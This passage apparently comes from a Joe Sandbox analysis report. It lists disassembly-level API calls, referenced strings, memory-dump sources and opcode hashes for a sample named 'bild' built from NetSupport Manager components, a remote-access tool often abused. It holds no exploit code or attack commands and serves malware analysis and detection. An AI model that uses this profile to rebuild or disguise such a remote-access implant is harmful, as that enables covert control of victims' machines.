                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$DeferEqualPointsRect
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2754115966-2830328467
                                                                                      • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                      • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                      • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepThread$CreateMessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 3347742789-2740779761
                                                                                      • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                      • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                      • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLock
                                                                                      • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                      • API String ID: 2752051264-327499879
                                                                                      • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                      • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                      • _strrchr.LIBCMT ref: 1114315A
                                                                                      • _strrchr.LIBCMT ref: 1114316A
                                                                                      • wsprintfA.USER32 ref: 11143185
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                      • String ID: BILD
                                                                                      • API String ID: 2529650285-1114602597
                                                                                      APIs
                                                                                      • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                      • _memmove.LIBCMT ref: 110653B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProfileString_memmove
                                                                                      • String ID: Device$No default printer,,LPT1:$Windows
                                                                                      • API String ID: 1665476579-2460060945
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      APIs
                                                                                      Strings
                                                                                      • %02x, xrefs: 11081350
                                                                                      • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081387
                                                                                      • ..\CTL32\DataStream.cpp, xrefs: 1108139E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                      • API String ID: 2111968516-476189988
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                      • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                      • TranslateMessage.USER32(?), ref: 1102543A
                                                                                      • DispatchMessageA.USER32(?), ref: 11025444
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchItemTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 1381171329-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$VisibleWindow
                                                                                      • String ID: %d,%d,%d,%d,%d,%d
                                                                                      • API String ID: 1671172596-1913222166
APIs
Strings
• BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CountTick$DeleteObject
• String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
• API String ID: 3011517232-3209293507
• Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
• Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
• Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
• Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 11077241
• CopyRect.USER32(?,00000004), ref: 1107726F
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077229
• m_hWnd, xrefs: 1107722E
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2755825785-2830328467
• Opcode ID: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
• Instruction ID: de278a2cd4c0b5f0839ddad857aefe36ed68345845b5ae66c69d21e7740d687e
• Opcode Fuzzy Hash: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
• Instruction Fuzzy Hash: 3841A331E00A06DBCB14CE68C9C8A5EF7F1FF84344F10C569E86597644EB30E941CB58
APIs
• _memmove.LIBCMT ref: 110D1128
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_memmovewsprintf
• String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
• API String ID: 1528188558-323366856
• Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
• Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
• Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
• Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
APIs
• GetProcAddress.KERNEL32(00000000,0000000E), ref: 1115FFD1
  • Part of subcall function 1115FE60: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 1115FE98
  • Part of subcall function 1115FE60: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 1115FED9
  • Part of subcall function 1115FE60: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115FEFD
  • Part of subcall function 1115FE60: RegCloseKey.ADVAPI32(?), ref: 1115FF2A
• LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 1115FF93
• LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 1115FFA9
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
• String ID: hhctrl.ocx
• API String ID: 1060647816-2298675154
• Opcode ID: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
• Instruction ID: 21cf1aba31526e8ead5fc6aa4b71c903af58d6e9e090c4be98d1d971a6eb0305
• Opcode Fuzzy Hash: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
• Instruction Fuzzy Hash: E911663260826B9BDB84DF65C994BDAF7A8EB4B758B41003FE521D3544EB70D844CB92
APIs
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
• MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
• SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: InfoMoveParametersSystemTimerWindow
• String ID: Max
• API String ID: 1521622399-2772132969
• Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
• Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
• Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
• Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
APIs
• IsWindow.USER32(?), ref: 110ED118
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessWindowwsprintf
• String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
• API String ID: 2577986331-1331251348
• Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
• Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
• Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
• Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 11081417
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
